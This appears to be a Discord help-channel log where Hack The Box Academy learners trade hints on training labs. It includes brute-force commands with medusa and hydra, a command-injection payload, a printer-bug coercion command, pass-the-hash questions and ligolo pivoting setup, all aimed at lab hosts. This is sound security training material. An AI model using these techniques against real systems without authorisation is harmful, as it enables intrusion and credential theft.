Thank you!
Has anyone completed poc and patching - null safety? I'm stuck trying to enumerate the admin id. I've only seen the user id returned in two places but can't see how to exploit them
what module is that under..?
Parameter logic bugs
@sour plaza Please make sure not to reveal content from modules above tier 0
You can download the iso or prebaked vm, but it's an OS, you can't just "run it" in windows.
Gotcha so gotta do it via virtual box to run it through a vm on my windows laptop
Or via wsl (windows subsystem for linux) which there's also a guide for but wsl is very shaky with networking issues
I saw that too! But did see there’s some cons going that route
Or via vmware, which is just another hypervisor
Gotcha! I’ll def do that when I get home from work today
No I'm not. An example is the local privilege escalation lessons. I'm just going through them in the order in which I've unlocked them. The most recent one I did taught a bunch of different methods for finding ways to escalate privileges, "Environment Enumeration" the task is: Enumerate the Linux environment and look for files that might contain sensitive data. Submit the flag as the answer.
The problem is you don't actually use any of the methods listed in the current lesson to find the flag.
I have the same issue and can't solve to be honest
Hi, just getting started in the Academy. On the Fundamentals Module. VMs. Downloaded and imported the WinDev2704Eval VM from the link in the module. However, when I boot it up it goes straight to a Blue Screen of Death! I've downloaded it twice in case it got corrupted but to no avail! Can anyone help!?
Download VMWare Workstation Pro for personal use it is free for personal use install Kali ISO on it and enjoy life
I've managed to install, Proxmox, Parrot and the full install ISO of Kali too. Just wanted get 'em all on!
What's VMWare Workstation Pro like to use, then? Compared to VirtualBox?
I don't know how to use the virtual machine on the HTB platform
It has a VPN but I don't really know how to use it
The question at the bottom I couldn't answer those
https://academy.hackthebox.com/module/57/section/491
Login Brute Forcing Module
'Medusa - Web Services' section.
Using the same command given in the section:
medusa -h <IP> -n <PORT> -u sshuser -P 2023-200_most_used_passwords.txt -M ssh -v 5 -t 1
I get this output:
```
ERROR: ssh.mod: Failed establishing SSH session (1/4): Host: 94.237.59.174 User: sshuser Pass: 123456
ERROR: [ssh.mod] Failed to exchange encryption keys. Are you sure this is a SSHv2 server?
NOTICE: [ssh] Host: 94.237.59.174 - Login thread (0) prematurely ended. The current number of parallel login threads may exceed what this service can reasonably handle. The total number of threads for this host will be decreased.
NOTICE: [ssh] Host: 94.237.59.174 User: sshuser Password: 123456 - The noted credentials have been added to the end of the queue for testing.
ERROR: ssh.mod: Failed establishing SSH session. The following credentials have been added to the missed queue for later testing: Host: 94.237.59.174 User: sshuser Pass: 123456
ERROR: ssh.mod: Failed establishing SSH session (1/4): Host: 94.237.59.174 User: sshuser Pass: 123456
ERROR: [ssh.mod] Failed to exchange encryption keys. Are you sure this is a SSHv2 server?
NOTICE: [ssh] Host: 94.237.59.174 - Login thread (0) prematurely ended. The current number of parallel login threads may exceed what this service can reasonably handle. The total number of threads for this host will be decreased.
NOTICE: [ssh] Host: 94.237.59.174 User: sshuser Password: 123456 - The noted credentials have been added to the end of the queue for testing.
ERROR: ssh.mod: Failed establishing SSH session. The following credentials have been added to the missed queue for later testing: Host: 94.237.59.174 User: sshuser Pass: 123456
```
I changed `-t 3` to `-t 1` and have restarted my instance.
When I `nc IP PORT`, I get the SSH banner:
`SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.10`
And hydra does it fine with this:
hydra -l sshuser -P 2023-200_most_used_passwords.txt -f -V ssh://94.237.59.174 -s PORT
The IP address 94.237.59.174 appears to be a Docker container. You probably also got a port. Only this one port is usable for you.
What if you just tried: medusa -h <IP> -n <PORT> -u sshuser -P 2023-200_most_used_passwords.txt -M ssh
The only port I've been using is the one I was given
I just didn't include it in my message because I wasn't sure if I was meant to share it publicly
Just tried and get the same error messages
You don't need to use them all. You need to use either Kali or Parrot not all of them. You have to download VPN file open it and connect this way to HTB.
You can DM if you'd like.
Thanks 🙂
Was this in response to my statement?
yes
Can anyone assist me with the detecting windows attacks with splunk skills assessment? I am stuck on the print nightmare and bloodhound question. Can anyone point me towards the correct direction? I’ve tried using the zero logon splunk searches but nothing comes up
Any ideas for troubleshooting?
Throughout this module, I have had this problem whenever I attempt to use a TGS to the specified resource.
Defensive modules are the most reading and confusing.
I just sent you a DM about it
Can someone teach me what are SQL injections ?
I don't click links btw
lol
That's the module that will teach you. This channel is specifically for the modules on Academy. If you aren't on HTB then I'm not sure how you found this discord, but this discord server is for HTB related things.
Just google "sql injection htb academy" if you don't want to click links lol
I found this on a discord advertisement
Better approach, thank you
So you clicked a link to join then?
708/1480 MB (256 MB allocatable)
Increase the amount of RAM your VM has
Refrain from posting content from modules over Tier 0, especially content that contains sensitive information i.e., hashes.
ok got it
@quasi wave Please remember you're asking for help from people who have completed these modules. There is no need to post info spoiling content above tier 0. Just articulate your problem and maybe provide the error or something. You have been asked a lot to stop.
wake up babe, new academy module just dropped 🔥
You ask about SQL injection inside a Hack The Box discord. Someone responds with the proper Hack The Box module in the academy, and you refuse to click it? You're going to have a hard time in this industry 😬
sorry I am working on it I have compulsion problems with stuff like that but I am working on it
hi I am on the last question of the skills assessment section of pivoting tunneling and port forwarding module. The way to get credentials from the machine that worked on the second pivot in order to get into third pivot does not work when trying to use the third pivot to get into the fourth pivot. Obviously, I am still trying credential hunting and I managed to get the third pivot. I also cannot enumerate the fourth subnet where the DC is using nmap. I tried LOLing it. Anyone know what to do in order to get the fourth pivot in order to get into the DC?
I don't want to post specific commands because I'm 99% certain I'll end up spoiling it
I need credentials for the other user so I can log into their folder
right now I am RDPd into third pivot box
you can describe the steps. if you fear you'l spoil it. you can DM me
Yey, has someone completed Credential Hunting in Shares (Password Attacks)? im stuck and I'd really appreciate a hint
Be specific in your questions. did you stuck on the assessment? or something else
Im stuck in the section, I do rdp, and i use both programs in Windows server (snaffler.exe with the recommended parameters, but its impossible to read) and PowerHuntShares that gives me an error
hey, did you use nxc --spider ?
ey, i use it with mendres credentials and it gives other errors
you got something with netexec --spider?
wanna see tht nxc error
im running the netexec command again, the moment i receive the error i'll tell you
Im also doing the same task right now, and I get that error. Been stuck on it for 4 hours now and it's a bit weird...
i just resolved the first question, feel free to dm
or dm @stuck hollow, he helped me without telling me the answer directly
glad can help you
Great! Thanks for the help @stuck hollow
Did you look into the available shares?
No I will look tomorrow tho
ended up doing a module skills assessment and got root the not intended way
anyways i found a file showing me how to do it the legit way and it included imgur links lol i think this is more written for htb staff? not sure
but cool find. im glad i found it bc i had root but i couldnt figure out the normal method of attack
it even links to an imgur with the actual flag for the machine, which i didnt find before
Generally there's not many unintended methods but reach out to support or post in #1234357888114364508 or submit /feedback to actually bring the issue to the team. Otherwise it's going to get buried in the chat
why is the first question in the new Credential Hunting in Network Shares module auto response? i don't remember that i solved it before
Likely a renamed section so it automatically filled bc db shenanigans
it's likely the actual answer isn't what's autofilled in
yeah
I'm doing the Attacking WPA/WPA2 Wi-Fi Networks module and am stuck at the last question of the section Enterprise Evil-Twin Attack.
I have the username (q1) and password(q2) and all I need for q3 is: " Connect to the HTB-Corp WiFi network using the obtained credentials. What is the value of the flag at 192.168.1.1? "
I've tried every security setting with the found username and password, but for the life of me can't connect to the htb-corp wifi. Any hints?
guys i am just starting out and am on the setting up module
im trying to install the vm manager and proxmox but when selecting the install proxmox ve (graphical) option in the proxmox vm
i just get a black screen on that window and nothing has happened now for the past 10 mins
any help?
you don't have to install proxmox
Hi there, anyone have any idea how a web PDF uploader can get me a reverse shell. Have tried using double extensions, %00 to escape, and that msf module to embed reverse shell into pdf. Still no luck, target is running on win64 apache web server
what academy module is this for?
Sounds familiar~ Is this for a box? 
oh no, not a module, just wanted to know what else I could look into
bouta pull my hair out ughhh
doesnt seem to process wtv PHP crap i placed in the file too zzzz
this channel is specifically about help with academy modules.
alrighty, thanks
Proxmox is not meant to be installed as a VM, it was a very long time ago that I went through that module, do they talk about Proxmox now? Set up virtualbox or VMware workstation since it's free now
yeah they changed the module around
updated for newer versions of stuff
Hi
I'm stuck in Suricata section in Working with IPS/IDS module
How can I solve this problem?
Enable the http-log output in suricata.yaml and run Suricata against /home/htb-student/pcaps/suspicious.pcap. Enter the requested PHP page as your answer. Answer format: _.php
Hello!
I am in Using Web Proxies - Burp Intruder. For the question, it asks to use Intruder to fuzz for .html files under the /admin directory. I was able to find the file using gobuster, but in intruder, it passed over the exact file with 404. I took the request to Repeater and added the right extension and it worked there. Not sure why it did 404 in the Intruder.
I am using Community Edition of Burp and it is running on my own Kali VM.
have you examined the full response it gives for the 404?
How to fetch data of htb Api
Well building a web there user can see our team rank and members and points etc. Thats why I need an Api to do it automatically
there's documentation the community has put together online
Can u share that document link
lmao, it is always right when you are ready to give up that if you give it one more try you will get a break through
you can probably google and find it; 'postman htb api'
Yeah I did it but I don't understand the document it needs authorization bearer key to fetch api so where I can find it
doesn't the docs explain that?
either way, not a convo for this channel, read #welcome to find/gain access to more of the server
Make sure you had url encoding off
am I doing anything wrong in "Information Gathering - Web Edition: section-Virtual Hosts" module, heres the ques: Brute-force vhosts on the target system. What is the full subdomain that is prefixed with "web"? Answer using the full domain, e.g. "x.inlanefreight.htb"
please someone help
--append-domain but what's the domain? it doesn't automagically know that 😉
it worked thankyou so much
Hi
I'm stuck in Suricata section in Working with IPS/IDS module
How can I solve this problem?
Enable the http-log output in suricata.yaml and run Suricata against /home/htb-student/pcaps/suspicious.pcap. Enter the requested PHP page as your answer. Answer format: _.php
It is literally in plaintext in packet capture, just think what protocol would most likely be used in which we would realistically provide credit card info? and answer is in same format. in which credit card number is found.
It is "xxxx xxxx xxxx xxxx", I think it is pretty clear from packet capture? (Dont include the quotes)
In attacking common application module, osticket section, isn't question worded a little wrong? "Find your way into the osTicket instance", when we just need to login using creds provided in section walkthrough? It is not mentioned anywhere that is the case.
im unable to find out the zap HUD in the browser
as a tip @onyx stag please include the module and section name; not the /module/NN/section/NNNN endpoint, unless someone was just on that page it takes a bit longer for people to figure out what you're talking about
i mean it's not showing as in the module
check if the last icon is enabled like this.
i cant rdp to my machine , can anybody help ?
yes
even if i turn it on the HUD is not showing in the inbuilt browser
anyone ?
did you visit some url or are you on default page?
I'm using the pwnbox too
I've visited the given url
selected manual scan
then pasted the url with HUD option on then launched the browser
reproducing these steps give me HUD on my kali machine.
dm and share screenshot
okay
ZAP hud isn't really required
Hey, anyone here done the tier 3 HTTP Attacks module? I am stuck on the HTTP Response Splitting exercise. I can get it working via my browser, but when I submit it to the admin, it just fails with no obvious reason why. Not sure if I am missing something but any nudges or assistance would be appreciated
I CANT RDP INTO MY MACHINE CAN SOMEONE HELP ?
i am using openvpn windows client to connect to vpn
and normal rdp service to join target machine but still its not happening
What do you mean with "auto response"? just curious
Hi
I want a suggestion
I just know the basics of computer..want to start hacking...from where should I start..like a roadway..
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
if you want some general starting pointers ^
I mean what to learn
it's a wide field my guy; that's why i pointed to the basic starting guide
yea I've figured
need help with the section repeating request
mind if i dm @fathom pendant ?
no dm
okay
where do i get my technical issues solved ?
@rain birch don't dm people without asking
Need some help? Learn how to reach the support team on Academy.
@nova berry ^
need help with section repeating requests guys
how to navigate through that ip=1;ls+-a?
@fathom pendant sorry, I was just trying to get help,
@fathom pendant can i dm you, its for a question, not about the modules
you can ask here. also you can utilize discord's search feature to see if other people asked the same question 😉
what is it about?
LinkedIn I Think
@fathom pendant I used the search engine within the module and saw that those people had had the same problem and I didn't find the solution, so I asked them. I'm sorry if I bothered anyone at any time and I apologize.
genuinely can't help there
i doubt they didn't find the solution
but i'll tell you the answer to your question is: read carefully
If it's really worth it when you finish a course at the academy, upload it on LinkedIn., that's the question, maybe its a stupid one.
I know how to read, I'm not stupid, your answer sounds arrogant
You could just drop your question w/module here so others can see and help out..
English only, I know what's being said. read #rules
also it wasn't arrogance; the answer to your question is in the section reading. They give you Bob's password
marcialee, you know?
I need a hint for Q2 of the skill assessment for the crackmapexec module.
I found the ||sqldev ||cred in the shared folder, but I'm stuck after that. I can't access interns or elevate privileges.
Thank you.
put your question here
that's completely up to you
okay, thanks you
i check the shares manual and i find a "password" i just trying to test the tool
@lime cosmos the output still contained info 😉
ls /home/kali/.manspider/loot => empty
i meant that the copy/paste wasn't redacted enough lol
aaa, so you found the .txt
but, in my opinion, you can find the second question searching manually, but you need to look at a lot of .txt
you found the both password manually?lol
hey im doing the password cracking module i been stuck trying to answer the question "What are the credentials to access the Edge-Router?" for 2 days now in the hunting windows credentials section. I would appreciate any hints or help, i have already tried using findstr to look for relevent files but no results.
hello, you can find it manually
wdym
search well
i believe it can be found by looking around the desktop for things
yes
need help with section repeating requests guys : how to navigate through that ip=1;ls+-a?
i have looked in the workstuff folder it only got 2 creds none of them worked
search well
its the only thing i can say
they are very explicit in telling you it's for the router iirc
Sigh. I just managed to solve a problem i encountered. i spent hours on some issue. skill issue as usual
wdym "how to navigate?"
does that request give you a response?
yes it does
you can't "navigate" with RCE; i.e. you can't change the directory
but you can run other commands
like cat or things like that
flag.txt(previous answer )
index.html
node_modules
package-lock.json
public
server.js
is the output
it asks for the flag in this section
well ls looks in the current directory by default
but you can tell it to look at other directories
i.e. if you run ls / from any directory, it will always show the filesystem root list
i might be blind or smt but there is nothin in desktop router related
not even the work folder?
omg im so stupid spent 2 days trying to find the creds within the C folder, when the answer is literally in front of me 😭
except flag.txt there are new directories
maybe work backwards
cd ..?
ohh yess
i already gave you a hint about how ls works
ls ?
if you ls ../ you ls the previous directory
ls ..?
ls ../ <- previous
ls / <- filesystem root
ls <- current directory
like how you cd ../ to go back a directory
or cd /full/directory/path to cd to a specific directory
ls takes a path as an input
so you can list stuff in other directories
ive tried backwards but only showing one directory named html with no extension and used again showing some directories and used again the root directory is opened .
this is definitely something new for me thanks
keep going backwards 😉
After root directory it keeps on repeating again 🫠
are you sure the file is the same 😉
cat also allows you to specify reading a file with the full filepath
i.e. no matter where you are in the system you can always cat /etc/hosts
yes 😭
did you try to read it? or did you do cat <filename> without changing anything specific
yes 😭 i did
i.e. /somefile.txt is not the same as ./somefile.txt
when you don't specify the filepath; it assumes current directory (./)
did you specify that you want it to read the one at the filesystem root?
remember you aren't moving around with RCE, ls is just showing you what's in where you're looking
it's not moving you there
i understood now 🫠
learned something really new thanks a lot @fathom pendant 😭👍
just want to say, pivoting and tunneling is really important. you have to setup your attack host and pivot in 2 ways, traffic that goes out need to know where to return to
i will thanks 😭, doing this path seems like will teach me a lot that need for me real useful and besides hope you guys are there for me to help me out sometimes 🫠
hi guys, currently at footprinting -> snmp.
I feel like i kind of got really lucky with getting the answers on snmp questions and on IMAP/POP3 module.
i feel like its not valid how i got the answers by luck kind of if that makes sense..
did someone else struggle with this?
what exactly do you mean by "got lucky," if you did the steps to get the answer it's not "luck"
well, as example in snmp module i just ran the snmpwalk tool with the community string shown in the examples. i didnt like bruteforce it or anything i just tried it and it worked. and now i feel like kind of dumb because its like i didnt struggle for it so its lucky?
i struggled so much in dns and so on that it feels kind of wrong? idk how to explain it better.
not struggling doesn't mean you got lucky
Guys I have recently joined this server
I am currently solving the Passwords Attacks module (Network Services) Section
I have solved the WINRM and SSH Bruteforcing questions
BUT the RDP and SMB is really messing with my head!!!
i have tried hydra medusa and crackmapexec and netexec
hydra just keeps saying user may be valid but not active in rdp bruteforcing for eternity
crackmapexec shows no error or output after entering my command just ENDS!!!
with hydra i am doing hydra -L username.list and -P password.list rdp://<target ip>
with crackmapexec i am doing crackmapexec rdp <target ip> -u username.list -p password.list
please give me hints or is there any mistake i am doing I have been stuck on the last 2 questions for hours
idk it just feels like i cheated you know..
you may have a chance to do bruteforcing in the skill assessment
yeah forgot about that!! thanks!
i am stuck in the network services those last 2 questions related to RDP and SMB I cannot solve I have tried literally everything
valid but not active for RDP means that the user may be able to be used to log in on a different service.
lots of users were valid i mean a LOT!!! and then tries to establish connection with RDP and fails
I figured it was a timeout thing then used -W 2 -W 3 ig to increase delay between checks and kept threading at -t 4 but no progress
yes because they aren't active for RDP; but they may have changed it from when i last did it
it does say NEW beside the module so yeah i guess they did modify it and add new sections, the offline hash cracking portion was good but these last 2 questions of the network services
are really messed up I mean ... i spent hours debugging a tool and whats wrong with it . If possible please help in guiding me with RDP and SMB bruteforcing
i suggest trying a different vpn region, tcp vpn (if you're using your own vm) if it's giving false positives for all logins, not just logins you discovered for other services
I just want to ask is there any difference to doing certain module task in the pwnbox and my own vm
I just cracked the RDP password using the Pwnbox of the academy
same command in my own vm with vpn and everything enabled keeps showing errors
worked ssh bruteforcing with hydra but not with the RDP ?!!!
@flat halo which Section Are you doing
Password Attacks
Network Services section
Can you pass me the link to the section
Nothing, I found it
What is the problem you have? @flat halo
Could be a multitude of different variables
Well I don't know hydra keeps throwing errors with the RDP bruteforcing in my VM but worked with the Pwnbox of academy 😕
anyway here's the link -> https://academy.hackthebox.com/module/147/section/1327#questionsDiv
could be a multitude of factors causing it to not work properly
could be as simple as running both pwnbox and vm at the same time, or that you were having connection issues, or for whatever reason your device isn't properly sending the request
I am using uname -r in the Bash terminal and the academy is not accepting my answer for the question, Which kernel release is installed on the system? (Format: 1.22.3) from that command. Is there anything I am doing wrong?
Omg. got it. Nevermind. They wanted me to login with SSH and not use the embedded window.
Im having some trouble with the module "working with files and directories" in the linux fundamentals section. I can't seem to get an ssh connection using the IP and the password provided at the bottom of the page. Has anyone else run into this issue?
@everyone do anybody got done with the credential hunting in network shares part
Read and follow #welcome
Thx, i will do that later
Are you connected to the vpn?
I am not able to crack 'bitlocker hash' in "Cracking Protected Archives" section of "Password Attacks". I have extracted hash using bitlocker2hash and tried to crack it using .\hashcat.exe .\hash.txt -m 22100 .\rockyou.txt. Can someone help me with it?
I was running into this. You need a very good internet connection. Next you download the OpenVPN application and install it. Finally, download the TCP VPN file from the HTB Academy website. This VPN file should be at the bottom of the page. Once that VPN file has been imported into OpenVPN and the VPN connection activated, then you should have no trouble using SSH.
Please don't ping the entire server. Just ask your question here and be patient.
okie
I figured it out. I’m an idiot and used an underscore instead of a dash
We all feel like idiots going through that course. Hopefully when I’m done I will feel like a smarter idiot.
We were driving down the road and I wasn’t paying enough attention lol
Good afternoon everyone, I need bug bountys to find some bugs in my domains
That's not what this discord is for. This place is for discussion of the various HTB platforms.
Sorry, I didn't know about that.
ah a classic ID-10T
Hi
Precisely 😅😅
or as the kids these days may call it PEBKAC
Problem Exists Between Keyboard And Chair
I can’t understand kids and their slang these days lol. My kids are always saying some off the wall stuff and I have no clue what it means
hello, im stuck in pass the hash first question, im using impacket-psexec and im getting an error
Does anyone know a good way to do sql injection? Can anyone help?
Try the sql injection fundamentals module on Academy
Thank you sir❤️🇧🇩
i prove all the tools to pass the hash and all give me the same error , ( No route to host)
Hi everyone Ive got an issue and I hate it. Im doing HTB for the last 3 months I've done all the fundamental modules and now im finally moving on in my pentester job role. I am way too reliant on chatGPT and I hate it.
Im currently doing the Firewall and IDS/IPS Evasion - Medium Lab and I can't get past the firewall to find the DNS service version.
I would love some general and specific advice if possible.
I am too reliant on chatgpt Dont worry, Just maintain your notes
what module is this under?
NMAP Ig
someone can help?
which module
password attacks?
password attacks
thank you
yes
i try all the tools in the section and i got the same error
@south marten Please make sure not to post content from modules above tier 0
Network Enumeration with Nmap
Are you using your own machine?
rather than pwnbox?
I actually hate that reliance its like an addiction/laziness
yes, is my own machine
okay, im sorry
make use of technology, No need to spend hour fixing a silly problem when the ai can help you but make sure to learn from the AI and take notes of the solution for future
So do you not feel that the more difficult road of sifting thru readings is a better way to learn instead of using AI to explain it?
No I like AI We should make use of technology but dont get too dependent on it
depends from person to person. You can use gpt if you like and makes ur learning fun but yea different opinions
@supple oxide I added you as a friend so we can either talk through it in DM's or if you want to battle the rate limit we can do so here 🙂
1: the command syntax you had worked out of the box for me through the pwnbox so I would check that you're using the correct interface/ running the vpn on your machine
2: There wasnt a second thing so I don't know why I made this a list
it was the vpn server
fixed now?
i change the vpn server and it fix it, so yea
When I do rdp it goes to -2 fps, how can I fix it?
is this in a vm? maybe give it more video ram
ok so up the video ram see if it helps
i want to confirm something in this command
python3 printerbug.py INLANEFREIGHT.LOCAL/<USER>:"PASS"@<DC01> <ATTACKER-ip> # force DC01 to auth back to ATTACKER
in the Pass the Certificate : printer bug
here we force the Domain controller (printer spooler service) to auth back to us so we will be in the result the ntlm of the domain controller right ?
are you talking about an xfreerdp session?
yes
could try some of these flags to optimize performance
/dynamic-resolution /compression /network:auto /gfx:AVC420:on +clipboard -themes
@mild jungle can u help me in julios hash question
Using Julio's hash, perform a Pass the Hash attack to connect to the shared folder \DC01\julio and read the file julio.txt.
Hey guys in the File upload attacks module, in the blacklist filters, why am I getting lengths 225, 229 and 230 for my intruder attacks when I'm supposed to get 193. The status for all of them are 200 though
you end up being able to control the DC's machine account
@mild jungle when you got a moment, any ideas on my question?
Yeah one sec
what part of it do you need help or understanding with?
im in pass the hash section 5th question .
Using Julio's hash, perform a Pass the Hash attack to connect to the shared folder \DC01\julio and read the file julio.txt.
The RDP is so bad for me that from time to time it throws me out lol
This was the only module I recall having choppy rdp for myself
Also I'm using the PHP extensions.lst PayloadsAllTheThings payload
I presume this is because your file extension names are varying in length
I'm going to look though
Yes I'm doing exactly as the module says but I'm not getting the length 193 in my payload attacks. And the "phtml" which i think is the right extension is showing me a response in the intruder that says "extension not allowed"
phtml is correctly not allowed
The reason it's not 193 length is because there's additional content being returned now vs when this module was written:
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
The screenshots from the module do not have the Keep-Alive header and the connection value is different
Hence the 20-30 character length difference
Okay but even when I try the extension where the file was accepted successfully like phpt, phtm or php3 and I try the url "/profile_images/(extension)?cmd=id" I get a blank page
Not all extensions will work with all web server configurations, try others!
That is for law enforcement not this server.
Someone who wants to give me the last question (it sounds terrible, but I can't handle the connection with the RDP)

do you use the +auto-reconnect feature of xfreerdp?
nope, how i use it
I don't remember the exact syntax, you might need to check the man page or help menu
try capturing a request for visiting one of the files you uploaded and then running the same intruder list through it such as :
"/profile_images/(extension)?cmd=id" to view all responses faster than navigating to each uploaded file
Ok let me try
as a nudge, the correct extension is in the list you said you were using 😄
I tried sending php3, phtm and phpt to repeater with php shell and then visiting the url with ?cmd=id and I'm just getting blank page
Also tried php4
Do i have to send each one from the intruder attack, to the repeater first before trying the url?
Not all of them are going to work for shell access
Might want to take this to DMs since the File Upload module is above tier 0
Just keep trying and look carefully within the response in intruder for the different kind of extensions
Ok do i have to send them to the repeater each time before trying the url?
You can dm me
Is there a reason that you get different results running Responder or Inveigh on two machines in the same network, on the same subnet?
(Context /w AD Skill assessment spoiler) || Specifically on one of the AD skill assessments you start your attack running responder on the provided Linux attack host. Later, you have run responder or inveigh on a separate compromised Windows host. Is this because the Windows machine is joined to the domain? I don't understand why responder on the Linux host is not sufficient||
Hello all, I think there's a bug or change in the Service Scanning module: https://academy.hackthebox.com/module/77/section/726, when I run the latest ParrotOS vm with up to date nmap against port 8080 of the first target IP, nmap says it doesn't recognize the banner and suggests I submit it to them. I get an http response back, but not a recognized version. I'm using the same command as the hint says.
other machines may be calling to it that aren't calling to the linux host
I'd love a bit of help trying to understand local port forwarding a service that's in an internal network, I made a bit of a diagram to help convey what I'm trying to do
in order to access the localhost of comp_2 you'd need access to comp_2
so you'd need to get a second hop running from comp_2 => comp_1 => Kali/you
i'm not getting any issues with the banner for that section
hop? as in another agent?
yes
since the localhost of comp_2 isn't accessible by any other device
Are you running nmap 7.94SVN?
or you'd have to set up a forwarding rule (typically requires admin/root privileges) on the comp_2 device
where would the second agent point to though? because COMP_2 can't access Kali directly can it? and there's no ligolo server on COMP_1
you don't need a server on comp_1
you can set up a listener
forward from comp_1:11601 => kali:11601
and have comp_2 call to comp_1:11601, which chains to your kali:11601 with the listener/rule
yes dm me with the output you have
Oh that makes sense. Like direct SMB connections to that IP with a bad share name vs. traffic that gets broadcast out to the whole subnet over LLMNR/mDNS/netbios?
You are not alone my friend! I was stuck in the EXACT same way 🤣
so would the listener setup be: listener_add --addr 10.10.17.17:11601 --to 10.10.14.14:11061 then run on MS02: ./agent.exe --connect 10.10.17.17:11601 --retry --ignore-cert
i'll try it
yep
if you haven't done the pivoting module, this is the core of it
what module is this for btw?
yeah the pivoting one, just using ligolo
